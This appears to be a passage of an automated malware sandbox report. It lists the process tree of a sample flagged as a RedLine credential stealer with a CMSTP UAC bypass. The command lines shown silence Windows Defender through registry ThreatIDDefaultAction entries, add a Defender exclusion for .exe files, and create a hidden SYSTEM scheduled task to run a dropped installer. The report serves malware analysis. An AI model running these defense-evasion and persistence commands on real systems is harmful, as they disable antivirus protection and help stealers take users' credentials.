Commandline:	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	17:11:31
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Imagebase:	0xe20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	17:11:34
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	17:11:34
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	17:11:34
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Imagebase:	0xe20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	17:11:34
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Imagebase:	0xe20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Imagebase:	0x1c0000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	17:11:35
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	17:11:36
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	17:11:36
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell start-process -WindowStyle Hidden gpupdate.exe /force
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	17:11:38
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F
Imagebase:	0x340000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	17:11:38
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	17:11:39
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\gpupdate.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\gpupdate.exe" /force
Imagebase:	0xef0000
File size:	25'088 bytes
MD5 hash:	6DC3720EA74B49C8ED64ACA3E0162AC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	17:11:39
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	17:11:40
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	17:11:40
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	17:11:40
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C schtasks /run /I /tn biPxHmULFllsbMgnpt
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	17:11:43
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
Imagebase:	0x790000
File size:	6'749'184 bytes
MD5 hash:	90487EB500021DBCB9443A2CF972A204
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	17:11:43
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /run /I /tn biPxHmULFllsbMgnpt
Imagebase:	0x340000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	17:11:44
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
Imagebase:	0x790000
File size:	6'749'184 bytes
MD5 hash:	90487EB500021DBCB9443A2CF972A204
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	17:11:45
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	17:11:45
Start date:	26/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	60
Start time:	17:11:45
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	17:11:48
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	17:11:48
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	17:11:48
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	17:11:48
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0xe20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	17:11:48
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	17:11:48
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\forfiles.exe
Wow64 process (32bit):	true
Commandline:	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Imagebase:	0xdd0000
File size:	41'472 bytes
MD5 hash:	D95C443851F70F77427B3183B1619DD3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	17:11:49
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	17:11:49
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Imagebase:	0xe20000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	17:11:49
Start date:	26/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xc90000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000045.00000002.3254906571.0000000001102000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000045.00000002.3254906571.0000000001102000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	70
Start time:	17:11:51
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	17:11:51
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	17:11:52
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
Imagebase:	0xc60000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.4%
Total number of Nodes:	1336
Total number of Limit Nodes:	20

Executed Functions

Function 00403532 Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32 ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
